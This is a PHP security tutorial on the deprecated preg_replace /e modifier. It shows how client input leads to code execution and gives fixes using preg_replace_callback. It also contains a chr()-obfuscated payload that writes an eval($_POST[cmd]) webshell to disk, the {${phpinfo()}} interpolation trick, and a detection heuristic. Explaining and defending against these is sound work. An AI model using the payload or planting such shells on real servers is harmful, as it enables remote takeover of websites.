
Use preg_replace's dangerous /e modifier with caution (commonly used for backdoors in one sentence)_PHP Tutorial

WBOY (original), 2016-07-21 15:05:23

preg_replace function prototype:

mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])

Special note:
The /e modifier makes preg_replace() treat the replacement argument as PHP code (after the backreferences have been substituted into it) and evaluate it. Make sure the replacement forms a valid PHP expression, otherwise PHP reports a parse error on the line containing preg_replace(). The /e modifier was deprecated in PHP 5.5.0 and removed in PHP 7.0.0; preg_replace_callback() is the supported alternative.
Example:

The code is as follows:

<?php
preg_replace("/(<\/?)(\w+)([^>]*>)/e",
             "'\\1'.strtoupper('\\2').'\\3'",
             $html_body);
?>


This will make all HTML tags in the input string uppercase.

Security threat analysis:
In practice one of the arguments often comes from the client, either the replacement string or the subject, and the client can supply malicious input. For example, with the replacement taken straight from a GET parameter:

The code is as follows:

<?php
echo preg_replace("/test/e", $_GET["h"], "just test");
?>


If we submit ?h=phpinfo(), phpinfo() is executed: with the /e modifier, preg_replace() evaluates the replacement argument as PHP code, and here that argument comes directly from the client.
What happens if we submit the following instead?

?h=eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(100).chr(97).
chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).
chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).
chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))

The chr() chain is only obfuscation, not encryption; decoded, it reads: fputs(fopen('data/a.php','w'),'<?php eval($_POST[cmd])?>');
The outer eval() runs that string, so the result is a one-line webshell (the "one-sentence Trojan", 一句话木马) written to data/a.php, relative to the script's current working directory. From then on the attacker can execute any PHP sent in the POST parameter cmd.
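To read such a payload during log review or incident response without running it, the following added example (not part of the original article) decodes a chr() concatenation chain and flags request parameters that carry the usual markers of a /e-sink attack. The function names, the regex heuristics and the sample value of h (rebuilt from the article's payload above) are assumptions made for this demonstration.

```php
<?php
// Added example, not from the original article: decode chr()-concatenation
// obfuscation without evaluating it, and flag request values that look aimed
// at a preg_replace() /e sink. Function names and heuristics are assumptions.

// Rebuild the string from every chr(N) occurrence, in order of appearance.
// Returns null when the value contains no chr() calls at all.
function decode_chr_chain($expr)
{
    if (!preg_match_all('/\bchr\s*\(\s*(\d{1,3})\s*\)/i', $expr, $m)) {
        return null;
    }
    $out = '';
    foreach ($m[1] as $code) {
        $out .= chr((int) $code);
    }
    return $out;
}

// Heuristic triage: an eval() wrapper, a run of three or more concatenated
// chr() calls, or PHP's {${...}} complex variable syntax in a request value.
function looks_like_e_modifier_payload($value)
{
    return (bool) preg_match(
        '/\beval\s*\(|(?:\bchr\s*\(\s*\d+\s*\)\s*\.\s*){3,}|\{\$\{/i',
        $value
    );
}

// Constructed sample: the h parameter from the article, rebuilt from its codes.
$codes = [102,112,117,116,115,40,102,111,112,101,110,40,39,100,97,116,97,47,97,46,
          112,104,112,39,44,39,119,39,41,44,39,60,63,112,104,112,32,101,118,97,108,
          40,36,95,80,79,83,84,91,99,109,100,93,41,63,62,39,41,59];
$h = 'eval(' . implode('.', array_map(function ($c) { return "chr($c)"; }, $codes)) . ')';

var_dump(looks_like_e_modifier_payload($h));   // bool(true)
echo decode_chr_chain($h), PHP_EOL;
// fputs(fopen('data/a.php','w'),'<?php eval($_POST[cmd])?>');

// A harmless value is not flagged, and a second marker from the article is.
var_dump(looks_like_e_modifier_payload('hello world'));          // bool(false)
var_dump(looks_like_e_modifier_payload('[php]{${phpinfo()}}[/php]')); // bool(true)
```

The decoder deliberately never calls eval(): the decoded text is data to be read by an analyst, and the same routine can be pointed at a recovered webshell or at the query string column of an access log. The heuristic is a triage aid, not a WAF rule; attackers can split or re-encode the chain, so treat a hit as a reason to look, not a verdict.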

A trickier example:

The code is as follows:

<?php
function test($str)
{
}
echo preg_replace("/\s*\[php\](.+?)\[\/php\]\s*/ies", 'test("\1")', $_GET["h"]);
?>


If we submit ?h=[php]phpinfo()[/php], will phpinfo() be executed?
Definitely not. After the match, the replacement becomes test("phpinfo()"), so phpinfo() is merely a string argument passed to test(). (Note also that preg_replace() with /e escapes the characters ', ", \ and NUL in the substituted backreferences, so the captured text cannot simply close the quote and append code.)
Is there any way to make it execute?


Of course. If we submit ?h=[php]{${phpinfo()}}[/php], phpinfo() is executed. Why?
In PHP, variables inside a double-quoted string are interpolated, that is, replaced by their values; inside a single-quoted string they are left untouched.
Note: a plain function call written inside a double-quoted string is not executed; "phpinfo()" is just text.

The trick is to build a special variable expression with {${...}}. The replacement becomes 'test("{${phpinfo()}}")', and when PHP evaluates that code it interpolates the double-quoted string: the complex syntax ${phpinfo()} first evaluates phpinfo() to obtain a variable name, so the function runs as a side effect of string interpolation. The payload contains no quotes or backslashes, so the escaping that preg_replace() applies to backreferences does not stop it.
You can do the following test first:

The code is as follows:

<?php
echo "{${phpinfo()}}";
?>

phpinfo() is executed and its output appears, even though it is only referenced inside a string. (phpinfo() returns true, so the expression then looks up the variable named "1", which is undefined; the echo itself contributes only an empty string and an undefined-variable notice.)

How to prevent this vulnerability?
For this specific code, change 'test("\1")' to "test('\\1')" so that the captured text is passed inside single quotes and '{${phpinfo()}}' is treated as an ordinary string (variables in single quotes are not interpolated; the double backslash is needed because inside a double-quoted PHP string \1 alone is an octal escape). That only patches one sink. The proper fix is to stop using /e altogether: rewrite the call with preg_replace_callback(), which hands the captured text to a callback as data and never compiles it as code. The /e modifier has been deprecated since PHP 5.5 and is rejected in PHP 7 and later (preg_replace() emits a warning and returns NULL), so code that still relies on it is both unsafe and broken.
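The vulnerable call from the example above beside its preg_replace_callback() rewrite, as an added example that is not part of the original article. The helper name test() follows the article; its body, the two render function names and the sample input are assumptions made for this demonstration.

```php
<?php
// Added example, not from the original article: the article's vulnerable /e
// pattern beside a preg_replace_callback() rewrite. test() follows the article;
// its body, the render_* names and the sample input are assumptions.

function test($str)
{
    // Stand-in for whatever the article's empty test() was meant to do.
    return '<code>' . htmlspecialchars($str, ENT_QUOTES, 'UTF-8') . '</code>';
}

// Vulnerable (only works on PHP 5.x; /e was removed in PHP 7.0).
// The replacement 'test("\1")' is compiled as PHP code. Because "\1" is a
// double-quoted string, a capture of {${phpinfo()}} becomes
// test("{${phpinfo()}}") and PHP's curly variable syntax evaluates phpinfo()
// while interpolating the string. preg_replace() escapes ' " \ and NUL in the
// captured text, so quotes cannot break out, but {${...}} needs none.
function render_php_tags_unsafe($input)
{
    return preg_replace('/\s*\[php\](.+?)\[\/php\]\s*/ies', 'test("\1")', $input);
}

// Safe: the callback receives the captured text as data. No PHP code is
// generated from it, so {${...}}, quotes or backslashes in $m[1] are inert.
function render_php_tags_safe($input)
{
    return preg_replace_callback(
        '/\s*\[php\](.+?)\[\/php\]\s*/is',
        function (array $m) {
            return test($m[1]);
        },
        $input
    );
}

// Constructed attacker input, the same trick as in the article.
$payload = 'before [php]{${phpinfo()}}[/php] after';

echo render_php_tags_safe($payload), PHP_EOL;
// before<code>{${phpinfo()}}</code>after   (the payload stays plain text)

if (PHP_VERSION_ID >= 70000) {
    // PHP 7+: /e is rejected. preg_replace() emits a warning that the /e
    // modifier is no longer supported and returns NULL, so legacy code built
    // on it breaks loudly instead of executing input.
    var_dump(render_php_tags_unsafe($payload)); // NULL
}
// On PHP 5.x, render_php_tags_unsafe($payload) would run phpinfo() instead.
```

The safe version keeps the i and s modifiers the article uses and drops only e; the callback signature is the same whether the capture contains code-looking text, quotes or backslashes, because nothing is ever parsed as PHP. When auditing a legacy code base, grep for preg_replace calls whose pattern string ends in a modifier set containing e and convert each one the same way.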
